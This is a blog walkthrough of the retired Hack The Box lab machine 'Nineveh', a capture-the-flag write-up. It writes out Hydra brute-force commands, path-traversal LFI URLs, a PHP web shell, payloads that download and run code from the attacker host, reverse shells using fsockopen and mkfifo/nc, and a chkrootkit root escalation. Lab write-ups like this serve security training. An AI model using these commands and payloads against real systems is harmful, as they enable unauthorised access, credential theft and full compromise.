Hackthebox.eu - Retired - Nineveh
Recon
I start with a simple UP/Down scan on all TCP ports.
Nmap -T4 -p- -oX ./nmapb.xml nineveh.htb
Then I convert the output to HTML to make it easy to ready
Xsltproc ./nmapb.xml -o ./nmapb.html
Looks like just port 80 and 443 are open. A webserver
Let’s run nmap again with the -A switch to run all the scripts against just these two ports
Nmap -T4 -p80,443 -A -oX ./nmapf.xml nineveh.htb
Then convert that to HTML too
Xsltproc ./nmapf.xml -o ./nmapf.html
Looks like we have Apache 2.4.18 running on an ubuntu server
Let’s browse 80 and 443 to see what it serves up.
80
SSL/ Port 443
Here is the cert info for ssl
Not much help there.
Let’s start to scan these websites and see if we can find something, We will be searching against both ports since they could have different files being served.
I’ll start with Nikto on port 80
Nikto -h http://nineveh.htb
Info.php is available which is a default apache page that gives a lot of info on the webserver.
It also looks like it might be vulnerable to RFI(Remote File Inclusion)
Dirb on port 80 gave us just some default results
Info.php which we already know about from nikto, index.html the default web page and server-status which we aren’t allowed to view
Dirbuster found http://nineveh.htb/department/
Dirb on port 443 gave another location https://nineveh.htb/db
phpLiteAdmin 1.9
Dirb and Nikto didn’t give me anything else to go on for a password here so we are going to to move over to exploit and try to brute force this login page using Hydra
Exploit
https://tools.kali.org/password-attacks/hydra
Hyrda is a brute force tool that can be used to attack things like websites,ftp and a bunch of other things. It has a lot of different switches and it took me a good 20 minutes to get all my settings right in order for this attack to work.
Before we can get to hydra we need to look at the login to get the parameters we need to feed into hydra.
So Let’s fire up burp and capture a failed login attempt
Here is the screenshot of failed login attempt
We need to gather the highlighted information to give to Hyrda.
We need to know the site we want hydra to attack, what the things being passed to the website are and what a failed response looks like
So here is the final command we are going to issue to hydra. I’ll break it down a little further.
hydra -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -S -l ''
Let’s walk through all the switches here.
-P this switch indicates that we are going to use a password list
Nineveh.htb this is the domain we are attacking
Http-post-form this is the type of request being used
"/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" this is the total command lets’ break it down
/db/index.php this is the actually login page
password=^PASS^ ^PASS^ is the variable the hydra will use our word list for
&remember=yes&login=Log+In&proc_login=true
These are the other parameters the website is expecting
:Incorrect This is the failed login message we get
-S indicates the site uses SSL
-l ‘’ supplying nothing for use name
Looks like our password is password123
not quite admin/admin but pretty damn close
Cool we are logged in now.
Let’s go back and run hydra against that department login too
Just like before let’s capture the login in burp so we know what to feed hydra
I’m just going to assume there is a user named admin
hydra -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -l "admin"
Eventually we got back 1q2w3e4r5t as the password for admin
After we log in we get
Here is notes section
Looky there, it's calling a file to display ninevehNotes.txt let's see if we can use this for some LFI
I started with just removing the files portion
http://nineveh.htb/department/manage.php?notes=ninevehNotes.txt
Next i tried changing the file to /etc/passwd
http://nineveh.htb/department/manage.php?notes=../../../../etc/passwd
Ok let's add files/ninevehnots.txt back but still with the /etc/passwd
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt/../../../../etc/passwd
Hmm that is a different error, this one seems more like an apache error than the other error of no note selected. I suspect that there is some sort of if statement behind this looking for maybe the ninevehnotes part… because if it's not there we get the generic no note selected error but get the apache error.
Lets try it again but take the files part out again.
http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../../../../etc/passwd
That worked so we do have some LFI here in the department page.
Ok now back to phpliteadmin There is an exploit that I found that we could use to execute some php that we create in a DB.. Now for brevity I didn't include all my failed attempts to get this to work. but I can assure you they were numerous and very time consuming
https://www.exploit-db.com/exploits/24044
So I created a DB name ninevehNotes.php (for the pesky filter)
I’m going to create table named shell
Then we will follow along with the exploit verbatim to see POC here.
I created a text field named shell with <?php phpinfo()?>
So it creates the DB in the /var/tmp/ directory which is not visible to the internet… damnit
But we did find the LFI on the department site hopefully we can leverage that to call the php maybe?
http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php
Cool,cool,cool,cool we were able to lfi our php “db”
Let's modify it again and see if we can get some talking from the box.
I’m just going to attempt to have it ping back to me first to make sure it allows outbound connections.
<?php exec('ping -c4 10.10.14.18')?>
I’ll update the value to be this new php
Then I setup a listener on my machine
Tcpdump -i tun0 -n icmp
Then refresh the notes page
Ok now we just need to modify this to hopefully do a shell session back instead of a ping.
Ok we are going to use python to create php variable that we can pass to the system directly
<?php echo system($_REQUEST["cmd"]); ?>
So now if we just add &cmd=*** after our URL it should execute whatever we put there as www-data
http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls
I fought with just trying to execute a reverse shell using the “db” php and couldn’t get it running
Eventually I hosted a php on my machine and used the db php to download and execute it.
My shell php call circusmonkey.php
<?php $sock=fsockopen("10.10.14.18",5555);exec("/bin/sh -i <&3 >&3 2>&3");?>
Then I inserted this code into the db to download and execute my php
<?php system("wget http://10.10.14.18:8000/circusmonkey.php -O /tmp/circusmonkey.php; php /tmp/circusmonkey.php"); ?>
Setup a listener on my box
Nc -lvp 5555
Ok we finally have a foothold
Lets use python3 to ge a little better shell here
python3 -c 'import pty; pty.spawn("/bin/bash")'
Poking around in the www folder I found a folder called secure_notes.
There is simply an HTML page that displays a png and the png file..
I browsed to that site and see this
Let’s download this png and see if there is some more to it than meets the eye
I ran strings against it
Strings ./nineveh.png
And found some interesting output
That sure looks like their private key for ssh.. Which would be great if ssh was open
But wait ssh is open, just not to the internet….
So we should be able to use his private key we found to ssh into localhost as armois
I made a file called key.txt on my kali box and used SimpleHTTPServer to download it to nineveh
ssh -i ./key.txt amrois@localhost ( don’t forget to chmod to tighten the rights to the file or ssh will complain chmod 600 ./key.txt)
Lets get that hash yo
Next I used my existing SimpleHTTPServer to downloads linpeas.sh to nineveh
What is this?
A script to delete text files in /report
I did a cat on all the files in the directory
Looks like the output of a program that is looking for root kits?
I grabbed one line and googled it
This was among the top results
https://forums.linuxmint.com/viewtopic.php?t=274218
Looks like a program called chkrootkit
Googling around a vulnerability in this program I found this
https://lepetithacker.wordpress.com/2017/04/30/local-root-exploit-in-chkrootkit/
Apparently if we place a file called update in the /tmp directory it will execute as root when the program is run
Considering the reports are being deleted every minute, I’m guessing the chkrootkit is running on the same schedule, even though I didn't see it in the cron jobs... something else must be running it
So as a POC i’m just going to make a executable that reads /root/root.txt and copy to a directory I can read
My update
cat /root/root.txt > /tmp/circusmonkey2/root.txt
I placed the file in the /tmp directory and gave it executable rights
Chmod +x ./update
Then checked my output folder
There we got our hash but what about a root shell? It should be trivial now that we have found this exploit.
Well looks like I figured out why my tires with netcat weren’t working when trying to get a foothold
But mkfifo seems to work fin
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.18 3333 >/tmp/f
So let’s update our update to have this instead
Wait for the chkrootkit to run
Much better.
This box was a dooozy, one of more difficult ones i’ve done lately
Comments
Post a Comment